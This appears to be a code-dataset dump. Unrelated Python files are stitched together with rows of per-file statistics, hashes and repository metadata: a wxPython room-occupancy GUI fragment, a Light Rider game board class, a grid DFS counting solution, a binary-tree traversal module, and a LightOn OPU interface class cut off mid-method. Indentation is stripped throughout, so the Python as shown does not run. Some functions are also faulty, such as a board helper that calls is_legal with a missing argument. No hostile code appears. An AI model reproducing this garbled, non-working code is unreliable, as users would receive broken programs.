self._add_confirm_button(main_vbox, 2)
# add result label
self._add_result_label(main_vbox)
# add widget infomation to dict
self.info_widget_dict["feeder"]["room_select"] = room_combobox
# add result widget
# add count
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Occupancy")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
main_vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
# add name list
namelb = wx.ListBox(self)
main_vbox.Add(namelb, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["occu_label"] = occu_label
self.info_widget_dict["consumer"]["name_list"] = namelb
self.SetSizer(main_vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q3_panel(self):
print("q3")
vbox = self.add_date_time_picker_layout()
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
name_label = wx.StaticText(self, label="Name")
name_label.SetFont(self.font)
hbox1.Add(name_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
name_text_ctrl = wx.TextCtrl(self)
name_text_ctrl.AppendText('Please enter unique name')
hbox1.Add(name_text_ctrl, proportion=8, flag=wx.TOP, border=5)
vbox.Add(hbox1, proportion=0, flag=wx.ALL, border=5)
# confirm button
self._add_confirm_button(vbox, 3)
# add result label
self._add_result_label(vbox)
# add widget infomation to dict
self.info_widget_dict["feeder"]["name_select"] = name_text_ctrl
# add result widget
# add count
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Room Count")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
# add name list
roomlb = wx.ListBox(self)
vbox.Add(roomlb, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["count_label"] = occu_label
self.info_widget_dict["consumer"]["room_list"] = roomlb
self.SetSizer(vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q4_panel(self):
print("q4")
main_vbox = self.add_date_time_picker_layout()
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
name_label = wx.StaticText(self, label="Name")
name_label.SetFont(self.font)
hbox1.Add(name_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
name_text_ctrl = wx.TextCtrl(self)
name_text_ctrl.AppendText('Please enter unique name')
hbox1.Add(name_text_ctrl, proportion=8, flag=wx.TOP, border=5)
main_vbox.Add(hbox1, proportion=0, flag=wx.ALL, border=5)
# confirm button
self._add_confirm_button(main_vbox, 4)
# add result label
self._add_result_label(main_vbox)
# add widget infomation to dict
self.info_widget_dict["feeder"]["name_select"] = name_text_ctrl
# add result widget
# add count
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Room Count")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
main_vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
# add name list
roomlb = wx.ListBox(self)
main_vbox.Add(roomlb, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["count_label"] = occu_label
self.info_widget_dict["consumer"]["room_list"] = roomlb
self.SetSizer(main_vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q5_panel(self):
print("q5")
vbox = wx.BoxSizer(wx.VERTICAL)
# datetime
date_hbox = wx.BoxSizer(wx.HORIZONTAL)
date_label = wx.StaticText(self, label="Datetime")
date_label.SetFont(self.font)
dpc = wx.adv.DatePickerCtrl(self, -1, wx.DefaultDateTime)
tpc = wx.adv.TimePickerCtrl(self, -1, wx.DefaultDateTime)
date_hbox.Add(date_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
date_hbox.Add(dpc, proportion=3, flag=wx.RIGHT, border=5)
date_hbox.Add(tpc, proportion=3, flag=wx.RIGHT, border=5)
vbox.Add(date_hbox, proportion=0, flag=wx.ALL, border=5)
# Room Info
room_hbox = wx.BoxSizer(wx.HORIZONTAL)
room_label = wx.StaticText(self, label="Room")
room_label.SetFont(self.font)
room_hbox.Add(room_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
room_list = [
"",
"Room_1_1_140",
"Room_1_1_141",
"Room_1_1_142",
"Room_1_1_143",
"Room_1_1_144",
"Room_1_1_150",
"Room_1_1_184"]
room_combobox = wx.ComboBox(self, choices=room_list)
room_hbox.Add(room_combobox, proportion=8, flag=wx.TOP, border=5)
vbox.Add(room_hbox, proportion=0, flag=wx.ALL, border=5)
# confirm button
self._add_confirm_button(vbox, 5)
# add result label
self._add_result_label(vbox)
# add widget infomation to dict
self.info_widget_dict["feeder"]["date_picker"] = dpc
self.info_widget_dict["feeder"]["time_picker"] = tpc
self.info_widget_dict["feeder"]["room_select"] = room_combobox
# add result widget
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Utilization")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["utilization_label"] = occu_label
self.SetSizer(vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
| 34.599144
| 158
| 0.580564
| 2,968
| 24,254
| 4.55593
| 0.096361
| 0.024848
| 0.043485
| 0.054578
| 0.651679
| 0.59259
| 0.580905
| 0.5088
| 0.49327
| 0.479515
| 0
| 0.030045
| 0.293271
| 24,254
| 700
| 159
| 34.648571
| 0.758824
| 0.123196
| 0
| 0.464455
| 0
| 0
| 0.075221
| 0.000995
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047393
| false
| 0.00237
| 0.026066
| 0
| 0.085308
| 0.042654
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e280ff84ed8b441621c5c137faf53691c8d37c
| 3,422
|
py
|
Python
|
Bot/Bot/board.py
|
Baidi96/AI-Agent-for-Light-Rider
|
6ae0cd4ea07248751c0f015ed74123ae3dec33d1
|
[
"MIT"
] | 1
|
2019-12-18T08:24:22.000Z
|
2019-12-18T08:24:22.000Z
|
Bot/Bot/board.py
|
Baidi96/AI-Agent-for-Light-Rider
|
6ae0cd4ea07248751c0f015ed74123ae3dec33d1
|
[
"MIT"
] | null | null | null |
Bot/Bot/board.py
|
Baidi96/AI-Agent-for-Light-Rider
|
6ae0cd4ea07248751c0f015ed74123ae3dec33d1
|
[
"MIT"
] | null | null | null |
import copy
import sys
PLAYER1, PLAYER2, EMPTY, BLOCKED = [0, 1, 2, 3]
S_PLAYER1, S_PLAYER2, S_EMPTY, S_BLOCKED, = ['0', '1', '.', 'x']
CHARTABLE = [(PLAYER1, S_PLAYER1), (PLAYER2, S_PLAYER2), (EMPTY, S_EMPTY), (BLOCKED, S_BLOCKED)]
DIRS = [
((-1, 0), "up"),
((1, 0), "down"),
((0, 1), "right"),
((0, -1), "left")
]
#the information of the whole grid
class Board:
def __init__(self, width, height):
self.width = width
self.height = height
self.cell = [[EMPTY for col in range (0, width)] for row in range(0, height)]
def parse_cell_char(self, players, row, col, char):
result = -1
if char == S_PLAYER1:
players[0].row = row;
players[0].col = col;
elif char == S_PLAYER2:
players[1].row = row;
players[1].col = col;
for (i, symbol) in CHARTABLE:
if symbol == char:
result = i
break
return result
def parse_cell(self, players, row, col, data):
cell = []
for char in data:
item = self.parse_cell_char(players, row, col, char)
cell.append(item)
return cell
def parse(self, players, data):
cells = data.split(',')
col = 0
row = 0
for cell in cells:
if (col >= self.width):
col = 0
row +=1
self.cell[row][col] = self.parse_cell(players, row, col, cell)
col += 1
def in_bounds (self, row, col):
return row >= 0 and col >= 0 and col < self.width and row < self.height
def is_legal(self, row, col, my_id):
enemy_id = my_id ^ 1
return (self.in_bounds(row, col)) and (not BLOCKED == self.cell[row][col]) and (not enemy_id == self.cell[row][col])
def is_legal_tuple(self, loc):
row, col = loc
return self.is_legal(row, col)
def get_adjacent(self, row, col):
result = []
for (o_row, o_col), _ in DIRS:
t_row, t_col = o_row + row, o_col + col
if self.is_legal(t_row, t_col):
result.append((t_row, t_col))
return result
def legal_moves(self, my_id, players):
my_player = players[my_id]
result = []
for ((o_row, o_col), order) in DIRS:
t_row = my_player.row + o_row
t_col = my_player.col + o_col
if self.is_legal(t_row, t_col, my_id):
result.append(((o_row, o_col), order))
else:
pass
return result
def update_cell(self, row, col, data):
self.cell[row][col] = data
def output_cell(self, cell):
done = False
for (i, symbol) in CHARTABLE:
if i == cell:
if not done:
sys.stderr.write(symbol)
done = True
break
if not done:
sys.stderr.write("!")
done = True
def output(self):
for row in self.cell:
sys.stderr.write("\n")
for cell in row:
self.output_cell(cell)
sys.stderr.write("\n")
sys.stderr.flush()
def tostring(self):
res = ""
for row in xrange(self.height):
for col in xrange(self.width):
res += str(self.cell[row][col])
res += ","
return res
| 29.247863
| 124
| 0.504383
| 457
| 3,422
| 3.636761
| 0.183807
| 0.057762
| 0.033093
| 0.042118
| 0.138387
| 0.104693
| 0.028881
| 0.028881
| 0.028881
| 0
| 0
| 0.018097
| 0.370251
| 3,422
| 116
| 125
| 29.5
| 0.753132
| 0.009643
| 0
| 0.173469
| 0
| 0
| 0.007674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132653
| false
| 0.010204
| 0.020408
| 0.010204
| 0.244898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e2b128cd1d2cb827ad4460d329a4ebc4a12998
| 884
|
py
|
Python
|
baekjoon/1012.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
baekjoon/1012.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
baekjoon/1012.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.setrecursionlimit(10000)
def dfs(r, c):
global visit
visit[r][c] = True
mov = [(-1, 0), (0, -1), (1, 0), (0, 1)]
for i in range(4):
dr, dc = mov[i]
nr, nc = r + dr, c + dc
if 0 <= nr < N and 0 <= nc < M and visit[nr][nc] == False and board[nr][nc] == 1:
dfs(nr, nc)
T = int(input())
for _ in range(T):
M, N, K = map(int, input().split())
board = [[0] * M for _ in range(N)]
for _ in range(K):
c, r = map(int, input().split())
board[r][c] = 1
visit = [[False] * M for _ in range(N)]
cnt = 0
for r in range(N):
for c in range(M):
if not visit[r][c] and board[r][c] == 1:
cnt += 1
dfs(r, c)
for ele in visit:
print(ele)
print()
print(cnt)
| 27.625
| 90
| 0.417421
| 138
| 884
| 2.644928
| 0.282609
| 0.134247
| 0.109589
| 0.021918
| 0.180822
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042471
| 0.414027
| 884
| 32
| 91
| 27.625
| 0.662162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.034483
| 0
| 0.068966
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e2b817212060ef7c5fee7505c4febd057adc71
| 5,827
|
py
|
Python
|
collection/cp/algorithms-master/python/binary_tree.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | 1
|
2019-03-24T13:12:01.000Z
|
2019-03-24T13:12:01.000Z
|
collection/cp/algorithms-master/python/binary_tree.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
collection/cp/algorithms-master/python/binary_tree.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
"""
Binary Tree and basic properties
1. In-Order Traversal
2. Pre-Order Traversal
3. Post-Order Traversal
4. Level-Order Traversal
"""
from collections import deque
class BinaryTree(object):
"""
Representation of a general binary tree
data: value of element
left: Left subtree
right: Right subtree
"""
def __init__(self, data, left=None, right=None):
if data is None:
raise ValueError('data cannot be null')
self.data = data
self.left = left
self.right = right
def insert(self, data):
raise NotImplementedError('Method insert is not Implemented')
def delete(self, data):
raise NotImplementedError('Method delete is not implemented')
def inorder_traversal(self, write=True):
"""
Return list of node data as inorder traversal. If write is True then print as well.
This is a iterative tree inorder traversal.
Algorithm:
1. Create a stack of nodes node_stack
2. Mark root as current
3. While current is not none or node_stack is not empty
a. While current is not empty push current to nde_stack and reassign current to current->left
b. If current is empty and node_stack is not empty then pop the top of stack and print that node
c. mark current as poped_node->right
"""
traversal_lis = []
node_stack = []
current = self
while current or node_stack:
while current:
node_stack.append(current)
current = current.left
if node_stack:
node = node_stack.pop()
traversal_lis.append(node.data)
current = node.right
if write:
for item in traversal_lis:
print(item, end=' ')
return traversal_lis
def preorder_traversal(self, write=True):
"""
Return list of node data as preorder traversal. If write is true then print as well.
Algorithm:
1. Create stack of nodes as node_stack
2. Mark root as current
3. While current is not none or node_stack is not empty
a. While current is not empty
i. Push current to node_stack
ii. Add current->data to traversal_list
iii. Reassign current to current->left
b. If node_stack is not empty then pop the topmost node from node_stack and assign current to
poped_node->right
"""
traversal_lis = []
node_stack = []
current = self
while current or node_stack:
while current:
node_stack.append(current)
traversal_lis.append(current.data)
current = current.left
if node_stack:
node = node_stack.pop()
current = node.right
if write:
for item in traversal_lis:
print(item, end=' ')
return traversal_lis
def postorder_traversal(self, write=True):
"""
Return list of node data as postorder traversal. If write is true then print as well.
Algorithm:
1. Create stack of nodes as node_stack
2. Mark root as current
3. While current is not None or node_stack is not empty
a. While current is not None
i. Push current to node_stack
ii. Append current->data to traversal_list
iii. Reassign current as current->right !IMPORTANT: Here we're iterating on current-right as we're doing
postorder traversal
b. If node_stack is not empty then pop top node and assign poped_node->left to current
"""
traversal_lis = []
node_stack = []
current = self
while current or node_stack:
while current:
node_stack.append(current)
traversal_lis.append(current.data)
current = current.right
if node_stack:
node = node_stack.pop()
current = node.left
if write:
for item in traversal_lis:
print(item, end=' ')
return traversal_lis
def levelorder_traversal(self, write=True):
"""
Return list of node data as level order traversal. If write is true then print as well.
Algorithm:
1. Maintain a queue of nodes to process as node_queue
2. Push root to node_queue
3. While node_queue is not empty
a. Get top node of node_queue as top
b. Push top->data to traversal_list
c. Append top->left and top->right into node_queue if they are not null
"""
traversal_list = []
node_queue = deque()
node_queue.append(self)
while node_queue:
top = node_queue.popleft()
traversal_list.append(top.data)
if top.left:
node_queue.append(top.left)
if top.right:
node_queue.append(top.right)
if write:
for item in traversal_list:
print(item, end=' ')
return traversal_list
def main():
"""
Tree Structure:
1
/ \
2 3
/ \
4 5
"""
tree = BinaryTree(1)
tree.left = BinaryTree(2)
tree.right = BinaryTree(3)
tree.left.left = BinaryTree(4)
tree.left.right = BinaryTree(5)
assert tree.inorder_traversal(write=False) == [4, 2, 5, 1, 3]
assert tree.preorder_traversal(write=False) == [1, 2, 4, 5, 3]
assert tree.postorder_traversal(write=False) == [1, 3, 2, 5, 4]
assert tree.levelorder_traversal(write=False) == [1, 2, 3, 4, 5]
if __name__ == '__main__':
main()
| 33.488506
| 120
| 0.579372
| 744
| 5,827
| 4.428763
| 0.157258
| 0.073748
| 0.027314
| 0.030956
| 0.557511
| 0.509863
| 0.509863
| 0.472231
| 0.435812
| 0.395448
| 0
| 0.012182
| 0.351982
| 5,827
| 173
| 121
| 33.682081
| 0.860434
| 0.386477
| 0
| 0.505747
| 0
| 0
| 0.030284
| 0
| 0
| 0
| 0
| 0
| 0.045977
| 1
| 0.091954
| false
| 0
| 0.011494
| 0
| 0.16092
| 0.045977
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e3869d32d3fe51b72766bc724a95897a33b8c9
| 32,841
|
py
|
Python
|
lightonml/opu.py
|
lightonai/lightonml
|
451327cccecdca4e8ec65df30f30d3fd8ad2194f
|
[
"Apache-2.0"
] | 27
|
2021-02-24T15:37:20.000Z
|
2022-01-12T00:28:22.000Z
|
lightonml/opu.py
|
lightonai/lightonml
|
451327cccecdca4e8ec65df30f30d3fd8ad2194f
|
[
"Apache-2.0"
] | 4
|
2021-02-26T12:58:21.000Z
|
2021-09-10T09:54:49.000Z
|
lightonml/opu.py
|
lightonai/lightonml
|
451327cccecdca4e8ec65df30f30d3fd8ad2194f
|
[
"Apache-2.0"
] | 9
|
2021-02-26T15:58:32.000Z
|
2021-06-21T09:18:48.000Z
|
# Copyright (c) 2020 LightOn, All Rights Reserved.
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
"""
This module contains the OPU class
"""
import time
from math import sqrt
import pkg_resources
from lightonml.encoding.base import NoEncoding, NoDecoding
import warnings
from typing import Optional, Union, Tuple, TYPE_CHECKING
import numpy as np
from contextlib import ExitStack
import attr
import inspect
import lightonml
from lightonml.internal.config import get_host_option, opu_version
from lightonml.internal import config, output_roi, utils, types
from lightonml.internal.user_input import OpuUserInput, InputTraits
from lightonml.internal.simulated_device import SimulatedOpuDevice
from lightonml.context import ContextArray
from lightonml.internal.settings import OpuSettings, TransformSettings
from lightonml.internal.runner import TransformRunner, FitTransformRunner
from lightonml.internal.types import InputRoiStrategy, IntOrTuple, TransformOutput, AcqState
from lightonml.types import OutputRescaling
# Import lightonopu only for typechecking, as it's an optional module and may not be present
if TYPE_CHECKING:
from lightonopu.internal.device import OpuDevice
# noinspection PyPep8Naming
class OPU:
"""Interface to the OPU.
.. math:: \\mathbf{y} = \\lvert \\mathbf{R} \\mathbf{x} \\rvert^2 \\mbox{ (non-linear transform, the default)}
.. math:: \\mathbf{y} = \\mathbf{R}\\mathbf{x} \\mbox{ (linear transform)}
Main methods are `transform`, `linear_transform`, `fit1d` and `fit2d`,
and accept NumPy arrays or PyTorch tensors.
The non-linear transform (`transform`) is a native operation for the OPU, and performs at a higher
speed than `linear_transform`.
Acquiring/releasing hardware device resources is done by open/close and a
context-manager interface.
Unless `open_at_init=False`, these resources are acquired automatically at init.
If another process or kernel has not released the resources, an error will be
raised, call `close()` or shutdown the kernel on the OPU object to release it.
Parameters
----------
n_components : int,
dimensionality of the target projection space.
opu_device : OpuDevice or SimulatedOpuDevice, optional
optical processing unit instance linked to a physical or simulated device.
If not provided, a device is properly instantiated.
If opu_device is of type SimulatedOpuDevice, the random matrix is generated
at __init__, using max_n_features and n_components
max_n_features: int, optional
maximum number of binary features that the OPU will transform
used only if opu_device is a SimulatedOpuDevice,
in order to initiate the random matrix
config_file : str, optional
path to the configuration file (for dev purpose)
config_override: dict, optional
for override of the config_file (for dev purpose)
verbose_level: int, optional
deprecated, use lightonml.set_verbose_level() instead
.. seealso:: `lightonml.set_verbose_level`
input_roi_strategy: types.InputRoiStrategy, optional
describes how to display the features on the input device
.. seealso:: `lightonml.internal.types.InputRoiStrategy`
open_at_init: bool, optional
forces the setting of acquiring hardware resource at init. If
not provided, follow system's setting (usually True)
disable_pbar: bool, optional
disable display of the progress bar when verbose_level is set to 1
simulated: bool, optional
performs the random projection using CPU, in case no OPU is available on your machine
the random matrix is then generated at __init__, using max_n_features and n_components
rescale: types.OutputRescaling, optional,
output rescaling method for `linear_transform`.
Ignored by `transform`.
.. seealso:: `lightonml.types.OutputRescaling`
Attributes
----------
n_components: int
dimensionality of the target projection space.
rescale: types.OutputRescaling,
output rescaling method for `linear_transform`.
Ignored by `transform`.
max_n_features: int
maximum number of binary features that the OPU will transform
writeable only if opu_device is a SimulatedOpuDevice,
in order to initiate or resize the random matrix
device: OpuDevice or SimulatedOpuDevice
underlying hardware that performs transformation (read-only)
input_roi_strategy: types.InputRoiStrategy, optional
describes how to display the features on the input device
"""
def __init__(self, n_components: int = 200000,
opu_device: Optional[Union["OpuDevice", SimulatedOpuDevice]] = None,
max_n_features: int = 1000, config_file: str = "",
config_override: dict = None, verbose_level: int = -1,
input_roi_strategy: types.InputRoiStrategy = types.InputRoiStrategy.full,
open_at_init: bool = None, disable_pbar=False, simulated=False,
rescale: Union[OutputRescaling, str] = OutputRescaling.variance):
self.__opu_config = None
self.__config_file = config_file
self.__config_override = config_override
self._max_n_features = max_n_features
self.disable_pbar = disable_pbar
self.rescale = rescale
# Get trace and print functions
if verbose_level != -1:
warnings.warn("Verbose level arg will removed in 1.3, "
"Use lightonml.set_verbose_level instead",
DeprecationWarning)
lightonml.set_verbose_level(verbose_level)
else:
verbose_level = lightonml.get_verbose_level()
self._debug = lightonml.get_debug_fn()
self._trace = lightonml.get_trace_fn()
self._print = lightonml.get_print_fn()
no_config_msg = "No configuration files for the OPU was found on this machine.\n" \
"You may want to run the OPU in a simulated manner, by passing the " \
"simulated argument to True at init.\n" \
"See https://docs.lighton.ai/notes/get_started.html#Simulating-an-OPU " \
"for more details.\n" \
"See also https://lighton.ai/products for getting access to our technology."
if simulated and opu_device is not None:
raise ValueError("simulated and opu_device arguments are conflicting")
# Device init, or take the one passed as input
if opu_device:
if type(opu_device).__name__ not in ["SimulatedOpuDevice", "OpuDevice"]:
raise TypeError("opu_device must be of type SimulatedOpuDevice or OpuDevice")
self.device = opu_device
elif simulated:
self.device = SimulatedOpuDevice()
else:
# Instantiate device directly
from lightonopu.internal.device import OpuDevice
if not self.__config_file and not config.host_has_opu_config():
# Looks like there's no OPU on this host as we didn't find configuration files
raise RuntimeError(no_config_msg)
opu_type = self.config["type"]
frametime_us = self.config["input"]["frametime_us"]
exposure_us = self.config["output"]["exposure_us"]
seq_nb_prelim = self.config.get("sequence_nb_prelim", 0)
name = self.config["name"]
self.device = OpuDevice(opu_type, frametime_us, exposure_us, seq_nb_prelim,
None, verbose_level, name)
self._base_frametime_us = self.device.frametime_us
self._base_exposure_us = self.device.exposure_us
if self._s.simulated:
# build the random matrix if not done already
self._resize_rnd_matrix(max_n_features, n_components)
else:
# Make sure lightonopu is at 1.4.1 or later, needed for linear_reconstruction
pkg_resources.require("lightonopu>=1.4.1")
# initialize linear_reconstruction library
from lightonopu import linear_reconstruction
linear_reconstruction.init(np.prod(self.device.input_shape))
self._output_roi = output_roi.OutputRoi(self.device.output_shape_max,
self.device.output_roi_strategy,
self._s.allowed_roi, self._s.min_n_components)
# This also sets the output ROI
self.n_components = n_components
self.input_roi_strategy = input_roi_strategy
# Runner initialized when entering fit
self._runner = None # type: Optional[TransformRunner]
# ExitStack for device acquisition, initialized when entering fit
self._acq_stack = ExitStack()
self._trace("OPU initialized")
# Open at init, unless relevant host.json option is False
if open_at_init is None:
open_at_init = get_host_option("lightonml_open_at_init", True)
if open_at_init:
self.open()
def _tr_settings(self, no_input=False, **override) -> TransformSettings:
"""Returns transform settings for feeding to TransformRunner"""
init = TransformSettings(self.input_roi_strategy, self.n_components)
settings = attr.evolve(init, **override)
if no_input and self.input_roi_strategy is InputRoiStrategy.auto:
# If no input_roi, replace auto by full strategy
settings.input_roi_strategy = InputRoiStrategy.full
assert settings.input_roi is None
return settings
def fit1d(self, X=None, n_features: int = None,
packed: bool = False, online=False, **override):
"""
Configure OPU transform for 1d vectors
The function can be either called with input vector, for fitting OPU
parameters to it, or just vector dimensions, with ``n_features``.
When input is bit-packed the packed flag must be set to True.
When input vectors must be transformed one by one, performance will
be improved with the online flag set to True.
Parameters
----------
X: np.ndarray or torch.Tensor
Fit will be made on this vector to optimize transform parameters
n_features: int
Number of features for the input, necessary if X parameter isn't provided
packed: bool
Set to true if the input vectors will be already bit-packed
online: bool, optional
Set to true if the transforms will be made one vector after the other
defaults to False
override: dict, optional
keyword args for overriding transform settings (advanced parameters)
"""
return self.__fit(X, n_features, packed, online, False, **override)
def fit2d(self, X=None, n_features: Tuple[int, int] = None,
packed: bool = False, online=False, **override):
"""
Configure OPU transform for 2d vectors
The function can be either called with input vector, for fitting OPU
parameters to it, or just vector dimensions, with `n_features`.
When input is bit-packed the packed flag must be set to True.
Number of features must be then provided with `n_features`
When input vectors must be transformed one by one, performance will
be improved with the online flag set to True.
Parameters
----------
X: np.ndarray or torch.Tensor
a 2d input vector, or batch of 2d input_vectors, binary encoded, packed or not
n_features: tuple(int)
Number of features for the input, necessary if X parameter isn't provided, or
if input is bit-packed
packed: bool, optional
whether the input data is in bit-packed representation
if True, each input vector is assumed to be a 1d array, and the "real" number
of features must be provided as n_features
defaults to False
online: bool, optional
Set to true if the transforms will be made one vector after the other
defaults to False
override: dict, optional
keyword args for overriding transform settings (advanced parameters)
"""
return self.__fit(X, n_features, packed, online, True, **override)
def transform(self, X, encoder_cls=NoEncoding, decoder_cls=NoDecoding) -> TransformOutput:
"""
Performs the nonlinear random projections of one or several input vectors.
The `fit1d` or `fit2d` method must be called before, for setting vector dimensions
or online option.
If you need to transform one vector after each other, add `online=True` in the fit function.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before transform"
assert self.device.active, "OPU device isn't active, use opu.open() or \"with opu:\""
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, self._runner.traits)
self._debug(str(user_input))
if user_input.is_batch and not self._s.simulated:
# With batch input start acquisition first
assert self.device.acq_state.value != AcqState.online.value, \
"Can't transform a batch of vectors when acquisition is" \
" in online mode, only single vectors"
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
out = self._runner.transform(user_input)
else:
out = self._runner.transform(user_input)
return self._post_transform(out, user_input, encoder, decoder_cls)
def linear_transform(self, X, encoder_cls=NoEncoding, decoder_cls=NoDecoding) -> TransformOutput:
"""
Do a linear transform of X, for Nitro (non-linear) photonic cores.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if traits.packed:
# TODO implement for packed
raise RuntimeError("Linear transform isn't yet implemented for packed input :/")
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, traits)
_, result_ctx = self._raw_linear_transform(X_enc, traits, user_input)
# Decoding, add context, and optional convert back to torch if needed
output = self._post_transform(result_ctx, user_input, encoder, decoder_cls)
# Rescale the output, intentionally after the decoding step
if self.rescale is OutputRescaling.variance:
n_features = user_input.n_features_s
output = output / (self._s.stdev * sqrt(n_features))
elif self.rescale is OutputRescaling.norm:
output = output / (self._s.stdev * sqrt(self.n_components))
return output
def transform1d(self, *args, **kwargs):
raise RuntimeError("transform1d is deprecated, you must now use fit1d and transform")
def transform2d(self, *args, **kwargs):
raise RuntimeError("transform2d is deprecated, you must now use fit2d and transform")
def fit_transform1d(self, X, packed: bool = False,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 1d input vector(s).
This function is the one-liner equivalent of `fit1d` and `transform` calls.
